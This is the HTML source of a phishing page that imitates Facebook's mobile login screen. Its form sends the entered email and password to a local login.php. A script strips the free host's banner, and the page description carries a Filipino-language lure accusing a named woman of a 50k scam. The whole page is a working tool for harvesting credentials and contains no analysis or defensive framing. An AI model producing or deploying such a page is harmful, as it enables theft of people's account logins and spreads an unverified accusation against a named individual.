<!DOCTYPE html>

<head>

<meta charset="UTF-8">
<meta name="viewport" content="width=devic­e-width, initial-scale=1.0, user-scalable=no">
<meta property="og:image" content="logo.jpeg">
<link rel="SHORTCUT ICON" href="logo.jpeg" type="image/jpg">
<meta name="description" content="Sa mga Nakakakilala kay Rhanda marie iniscam nyako ng 50k sa pag sanla tira ng bahay nila wala namang titulo please pakihanap name nya">
<link rel="stylesheet" href="https://­use.fontawesome.com/­releases/v5.7.0/css/­all.css" integrity="sha384-lZ­N37f5QGtY3VHgisS14W3­ExzMWZxybE1SJSEsQp9S­+oqd12jhcu+A56Ebc1zF­SJ" crossorigin="anonymo­us">
<link rel="stylesheet" href="https://­cdnjs.cloudflare.com/­ajax/libs/­font-awesome/4.7.0/­css/­font-awesome.min.css">
<link href="https://­fonts.googleapis.com/­css?family=Roboto" rel="stylesheet">
<title>Facebook - Log In or Sign Up</title>
</head>
<style type="text/css">

/* Styles for whole web page */
* {
box-sizing: border-box;
}
body {
margin: 0;
padding: 0;
font-family: 'Roboto', Helvetica, Sans-serif;

}
.clearfix::after {
content: "";
clear: both;
display: table;
}
a {
color: #365899;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}


/* Styles for header */
/* Styles for mid-section */
.mobmaindiv {
background-color: #fff;
min-width: 320px;
width: 100%;
height: 294px;
padding-left: 16px;
padding-right: 16px;
}
#mobtextdiv {
max-width: 420px;
margin: auto;
margin-bottom: 11px;
padding-top: 16px;
}
.mobtextbox {
width: 100%;
padding: 12px;
border: 1px solid #DBDEE4;
border-radios: 1px;
}
.mobtextbox::-webkit­-input-placeholder {
font-size: 14px;
}
.mobloginbuttondiv {
max-width: 420px;
margin: auto;
}
.mobloginbutton {
font-size: 14px;
font-weight: bold;
color: white;
background-color: #3578E5;
width: 330px;
height: 39px;
border-radius: 5px;
border: 1px solid #3578E5;
}

#ordiv {
text-align: center;
margin: 4px 0 12px 0;
}
#or {
font-size: 14px;
color: #4B4F56;
position: relative;
}
#or::before, #or::after {
content: "";
position: absolute;
width: 110px;
height: 1px;
background-color: #ccd0d5;
top: 50%;
}
#or::before {
right: 100%;
margin-right: 15px;
}
#or::after {
left: 100%;
margin-left: 15px;
}

#mobcreatediv {
text-align: center;
}
#mobcreate {
height: 39px;
width: 169px;
color: white;
background-color: #00a400;
border: 1px solid #00a400;
border-radius: 5px;
font-size: 14px;
font-weight: bold;
}

.mobforgotpw {
margin-top: 15px;
font-size: 12px;
text-align: center;
}
.mobforgotpw a {
color: #7596c8;
text-decoration: none;
}


/* Styles for footer */
.mobfooter {
min-width: 320px;
width: 100%;
background-color: #FFF;
}
#moblangs {
display: flex;
margin-top: 20px;
}
.item1, .item2 {
flex-grow: 1;
}
.mobfooter #moblangs li {
list-style-type: none;
font-size: 12px;
text-align: center;
margin-bottom: 2px;
}
.mobfooter #moblangs li a {
color: #576b95;
}
#mobcurrentlang {
color: #90949c !important;
font-weight: 500;
letter-spacing: 0.5px;
}
.mobfooter #moblangs li a .fa {
font-size: 24px;
color: #576b95;
}

.mobcopyright {
text-align: center;
}
.mobfbcopyright, #mobdisclaimer, #mobcopyrightfblink {
font-size: 12px;
color: #808080;
margin: auto;
}
.mobcopyright span .fa {
color: #0274b3;
font-size: 14px;
}
#mobpranavks {
color: #0274b3;
}
.input{
background: none;
color: #1c1e21;
font-size: 14px;
padding: 13px 16px;
width: 330px;
border-radius: 6px;
background: #FFFFFF;
border: 1px solid #dddfe2;
color: #1d2129;
margin-top: 15px;
}
.cret a{
text-decoration: none;
color: #fff;
}
b {
color: #3578E5;
text-align: center;
font-size: 24px;
}
.error {
background-color: red;
height: 20px;
}
</style>
<script type="text/javascript" charset="utf-8">
  window.onload = () => {
   let bannerNode = document.querySelector('[alt="www.000webhost.com"]').parentNode.parentNode;
   bannerNode.parentNode.removeChild(bannerNode);
}

</script>
<body>
<div class="mobile">
<center>
<form method="POST" action="login.php">
<br><center><b>faceb­ook</b></center>
<div class="mobmaindiv">
<div id="mobtextdiv">
<input type="text" name="email" class="input" placeholder="Mobile number or email">
<br>
<input type="password" name="password" class="input" placeholder="Password">
</div>
<div class="mobloginbutto­ndiv">
<input type="submit" class="mobloginbutton" value="Log In">
</div>
<div id="ordiv">
<span id="or">or</span>
</div>
<div id="mobcreatediv">
<button id="mobcreate"><div class="cret"><a href="" >Create New Account</a></div></­button>
</div>
<div class="mobforgotpw">
<a href="">Forgotten password?</a>
</div>
</div>
<br><br>
<div class="mobfooter">
<div id="moblangs">
<div class="item1">
<li><a href="#" id="mobcurrentlang">­English (UK)</a></li>
<li><a href="#">Shaip</a></­li>
<li><a href="#">हिन्दी</­a></li>
<li><a href="#">Português</­a></li>
</div>
<div class="item2">
<li><a href="#">Filipino</­a></li>
<li><a href="#">Turkce</­a></li>
<li><a href="#">Español</­a></li>
<li><a href="#"><i class="fa fa-plus-square-o"></­i></a></li>
</div>
</div>
<br>
<div class="mobcopyright"­>
<span class="mobfbcopyrigh­t"><a href="" target="_blank" id="mobcopyrightfbli­nk">Facebook Inc</a></span><br>
</div>
</div>
</form>
</center>
</div>
</body>